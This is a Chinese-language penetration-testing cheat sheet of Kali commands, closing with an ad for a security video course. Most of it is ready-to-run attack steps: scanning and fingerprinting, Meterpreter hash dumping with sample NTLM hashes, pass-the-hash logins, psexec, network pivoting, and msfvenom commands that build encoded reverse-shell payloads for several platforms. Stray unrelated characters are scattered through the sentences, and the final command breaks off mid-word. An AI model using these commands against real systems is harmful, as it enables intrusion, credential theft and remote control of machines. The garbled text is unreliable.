總結(jié)在滲透測試上的一些小技巧，基本上都是 kali 下的一些常用的工具使用集合

DIRB
使用 DIRB 爆破目錄
注： DIRB 是一個專門用于爆破目錄的工具蹄殃，在 Kali 中默認已經(jīng)安裝，類似工具還有國外的 patator ， dirsearch 择葡， DirBuster 挨务， 國內(nèi)的御劍等等击你。

dirb http://[IP]:PORT /usr/share/dirb/wordlists/common.txt
Niko
使用 Nikto 掃描 Web 服務
nikto -C all -h http://[IP]
wpscan
使用 wpscan 掃描 WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http:http://[IP]/ –enumerate p
httprint
使用 httprint 進行 HTTP 指紋識別
wget //www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://[IP] -s signatures.txt
Skipfish
使用 Skipfish 進行 Web 應用安全
注：Skipfish 是一款 Web 應用安全偵查工具，Skipfish 會利用遞歸爬蟲和基于字典的探針生成一幅交互式網(wǎng)站地圖谎柄，最終生成的地圖會在通過安全檢查后輸出丁侄。

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://[IP]
nc
使用 nc 進行掃描
nc -v -w 1 target -z 1-1000
for i in {101…102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
us
使用 Unicornscan 進行信息收集和安全審計
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

-H 在生成報告階段解析主機名

-m 掃描類型 (sf - tcp, U - udp)

-Iv - 詳細

Xprobe2
使用 Xprobe2 識別操作系統(tǒng)指紋
xprobe2 -v -p tcp:80:open IP
Meterpreter
使用 Meterpreter 進行端口轉(zhuǎn)發(fā)

//www.offensive-security.com/metasploit-unleashed/portfwd/

轉(zhuǎn)發(fā)遠程端口到目標地址

meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
使用 Meterpreter 獲取哈希值
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash http://[IP] cmd

或者

apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

再或者

meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
使用 Hashcat 破解密碼
hashcat -m 400 -a 0 hash /root/rockyou.txt
使用 metasploit 進行穿透
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

或者

//www.offensive-security.com/metasploit-unleashed/pivoting/

meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address : 10.1.13.2
ssh
SSH 穿透
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
SSH 穿透從一個網(wǎng)絡到另一個網(wǎng)絡
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
msfvenom
MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b “\x00” -a x86 --platform win -f c
MSF 生成在 Linux 下反彈的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反彈 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 --platform win -f c
MSF 生成反彈 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反彈 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp
MSF 生成反彈 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
MSF 生成反彈 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
add <?php at the beginning
perl -i~ -0777pe’s/^/<?php \n/’ shell.php
MSF 生成反彈 Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=<Your Port to Co

kali 下滲透測試的一些小技巧

小編專門整理了一套有關(guān)網(wǎng)絡安全2021從入門到精通學習視頻教程

包含了網(wǎng)絡安全學習路線全階段視頻教程（從入門到精通），涵蓋了你所需要掌握的所有前沿技術(shù)及知識點朝巫！

資料針對人群

• 在校大學生
• 零基礎(chǔ)小白
• 想學習安全課程的朋友
• 想轉(zhuǎn)行的朋友
• 有運維基礎(chǔ)想提升的朋友
• 想學習運維的朋友
• 想進階學習網(wǎng)絡安全

在學習網(wǎng)絡安全的路上鸿摇，難免深受這些難題的困擾：

• 如何才能成功進攻網(wǎng)絡安全行業(yè)呢？
• 零基礎(chǔ)怎樣學習才能更快入門劈猿、學起來更有效率拙吉？
• 怎么確保自己學到的是市場需求的潮孽？

額外福利：安全學習路線一份和價值499的體驗課程免費學習權(quán)限

kali 下滲透測試的一些小技巧